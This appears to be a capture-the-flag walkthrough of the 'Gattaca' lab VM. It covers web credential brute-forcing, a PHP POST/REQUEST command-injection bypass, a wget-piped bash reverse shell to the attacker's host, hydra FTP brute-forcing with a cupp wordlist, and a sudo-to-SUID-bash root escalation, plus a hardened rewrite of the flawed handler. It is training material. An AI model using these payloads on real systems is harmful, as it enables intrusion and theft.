# Lab setup
Download: Gattaca
NAT, IP: 192.168.1.172
# Penetration process
# Initial information gathering
```text
PORT   STATE    SERVICE VERSION
21/tcp filtered ftp
80/tcp open     http    Apache httpd 2.4.57 ((Debian))
|_http-server-header: Apache/2.4.57 (Debian)
|_http-title: Gattaca
```
Found during enumeration: http://192.168.1.172/cards.php
Password brute-forcing: pick a suitable wordlist, otherwise a weak-password run takes forever.
One working pair of credentials: admin/admin12345
After logging in it is simply a file-inclusion page, so include cards.php itself and take a look:
```php
<?php
$folder = "/var/www/gattaca/cards";
$files = scandir($folder);
$files = array_diff($files, array('.', '..'));
foreach ($files as $files) {
    echo "<li>$files</li>";
}
if (isset($_REQUEST['filename'])) {
    if (!preg_match('/[^A-Za-z0-9. _-]/', $_POST['filename'])) {
        $output = shell_exec("cat " . $_REQUEST['filename']);
        echo "$output";
    } else {
        echo "Malicious Request Denied!";
    }
}
?>
```
The regex logic: check whether a `filename` parameter is present, take the `filename` from POST, and allow only letters, digits, `.`, space, `_` and `-` (the character class in the regex). Then run `cat filename`.

That is the problem: the check reads `$_POST['filename']`, but the command reads `$_REQUEST['filename']`. Put the parameter in the query string (GET) with an empty POST body and `$_POST['filename']` is unset, so the regex check passes while `$_REQUEST` still picks up the GET value; that is straight command execution (RCE), so a shell follows directly.
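For comparison, a hardened rewrite of the same handler, added here as an example and not the lab's own code: the check and the use share one request source, the name is matched exactly against the directory listing instead of a regex, and the file is read with `file_get_contents` rather than a shell command. The `/var/www/gattaca/cards` folder is the one from the page; the function names are mine.

```php
<?php
// Added hardened rewrite of the page's cards.php handler (not the lab's own code).
// Two defects in the original: the regex checks $_POST['filename'] but the
// command uses $_REQUEST['filename'] (so a GET value bypasses the check when the
// POST body is empty), and the value is still passed to a shell. Fix both:
// validate and use the same variable, and never build a shell command at all.

declare(strict_types=1);

const CARDS_DIR = '/var/www/gattaca/cards';   // same folder as the page's script

/** Return the list of regular files in the cards folder (this is the allowlist). */
function listCards(string $dir): array
{
    $files = scandir($dir);
    if ($files === false) {
        return [];
    }
    return array_values(array_filter($files, fn(string $f): bool => is_file($dir . '/' . $f)));
}

/** Return the card's contents, or null if the name is not an exact allowlist entry. */
function readCard(string $dir, string $name): ?string
{
    // Exact-match allowlist: no regex, no shell, no path components accepted.
    if (!in_array($name, listCards($dir), true)) {
        return null;
    }
    $path = realpath($dir . '/' . $name);
    // Defence in depth: the resolved path must still live under the cards folder.
    if ($path === false || strpos($path, realpath($dir) . '/') !== 0) {
        return null;
    }
    $data = file_get_contents($path);
    return $data === false ? null : $data;
}

foreach (listCards(CARDS_DIR) as $f) {
    echo '<li>' . htmlspecialchars($f, ENT_QUOTES, 'UTF-8') . "</li>\n";
}

// Read from one request source only, and reject array-valued parameters
// (filename[]=...), so the check and the use always see the same string.
if (isset($_POST['filename']) && is_string($_POST['filename'])) {
    $output = readCard(CARDS_DIR, $_POST['filename']);
    echo $output === null
        ? 'Malicious Request Denied!'
        : '<pre>' . htmlspecialchars($output, ENT_QUOTES, 'UTF-8') . '</pre>';
}
```

With this version the request shown below (`?filename=;cat+/etc/passwd` with an empty body) is simply ignored, because nothing is read from the query string at all.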
```http
POST /cards.php?filename=;cat+/etc/passwd HTTP/1.1
Host: 192.168.1.172
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
Origin: http://192.168.1.172
Authorization: Basic YWRtaW46YWRtaW4xMjM0NQ==
Connection: close
Referer: http://192.168.1.172/cards.php
Upgrade-Insecure-Requests: 1
```
Got passwd:
```text
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
messagebus:x:100:107::/nonexistent:/usr/sbin/nologin
sshd:x:101:65534::/run/sshd:/usr/sbin/nologin
v.freeman:x:1000:1000::/home/v.freeman:/bin/bash
i.cassini:x:1001:1001::/home/i.cassini:/bin/bash
ftp:x:102:110:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
```
A reverse shell won't pop directly, so the only option is to write a script, upload it and execute it.
```text
┌──(root㉿kali)-[~]
└─# cat shell.sh
#!/bin/bash
bash -i >& /dev/tcp/192.168.1.129/4444 0>&1

┌──(root㉿kali)-[~]
└─# python -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.1.172 - - [01/Jun/2024 12:57:43] "GET /shell.sh HTTP/1.1" 200 -
```
```http
POST /cards.php?filename=;wget+-O+-+http://192.168.1.129:8000/shell.sh|bash HTTP/1.1
Host: 192.168.1.172
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
Origin: http://192.168.1.172
Authorization: Basic YWRtaW46YWRtaW4xMjM0NQ==
Connection: close
Referer: http://192.168.1.172/cards.php
Upgrade-Insecure-Requests: 1
```
Got a shell.
# Privilege escalation
There is an ftppolicy.txt under the www directory; take a look:
```text
www-data@gattaca:/var/www$ cat ftppolicy.txt
** IMPORTANT **
Remember, when changing your password it must contain these requirements:
1. Must be 8 characters or longer
2. Must contain numbers
3. Must contain special characters
Don't waste time with v.freeman and rockyou.txt
```
So the rockyou wordlist is out, and v.freeman doesn't need brute-forcing either; since the password rules are given, a custom wordlist is needed.
Port 21 is filtered and can't be reached directly, so the shell already obtained has to be used to tunnel out and map the port to the local machine.
```text
┌──(kali㉿kali)-[~/cupp]
└─$ cupp -i
 ___________
   cupp.py!                 # Common
      \                     # User
       \   ,__,             # Passwords
        \  (oo)____         # Profiler
           (__)    )\
              ||--|| *      [ Muris Kurgas | [email protected] ]
                            [ Mebus | https://github.com/Mebus/]

[+] Insert the information about the victim to make a dictionary
[+] If you don't know all the info, just hit enter when asked! ;)

> First Name: irene
> Surname: cassini
> Nickname: i.cassini
> Birthdate (DDMMYYYY):

> Partners) name:
> Partners) nickname:
> Partners) birthdate (DDMMYYYY):

> Child's name:
> Child's nickname:
> Child's birthdate (DDMMYYYY):

> Pet's name:
> Company name: gattaca

> Do you want to add some key words about the victim? Y/[N]: n
> Do you want to add special chars at the end of words? Y/[N]: y
> Do you want to add some random numbers at the end of words? Y/[N]:y
> Leet mode? (i.e. leet = 1337) Y/[N]: y

[+] Now making a dictionary...
[+] Sorting list and removing duplicates...
[+] Saving dictionary to irene.txt, counting 7964 words.
[+] Now load your pistolero with irene.txt and shoot! Good luck!
```
```text
┌──(root㉿kali)-[~]
└─# hydra -l i.cassini -P irene.txt ftp://127.0.0.1/ -I -t 64 -V
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-06-01 23:55:31
[DATA] max 64 tasks per 1 server, overall 64 tasks, 7532 login tries (l:1/p:7532), ~118 tries per task
[DATA] attacking ftp://127.0.0.1:21/
[21][ftp] host: 127.0.0.1   login: i.cassini   password: 1r3n3!$%
```
Got the credentials: i.cassini/1r3n3!$%
```text
www-data@gattaca:/var/www/gattaca$ su i.cassini
Password:
i.cassini@gattaca:/var/www/gattaca$ sudo -l
Matching Defaults entries for i.cassini on gattaca:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    use_pty

User i.cassini may run the following commands on gattaca:
    (ALL : ALL) NOPASSWD: /usr/bin/acr
i.cassini@gattaca:/var/www/gattaca$ cd ~
i.cassini@gattaca:~$ touch exploit && chmod +x exploit
i.cassini@gattaca:~$ echo "chmod 4777 /bin/bash" > exploit
i.cassini@gattaca:~$ sudo /usr/bin/acr -r exploit
error: this is not an acr generated configure script.
i.cassini@gattaca:~$ bash -p
bash-5.2# cat /root/root.txt
bd1061ef36aca528a49f69c00f1feb66
```
Got a root shell.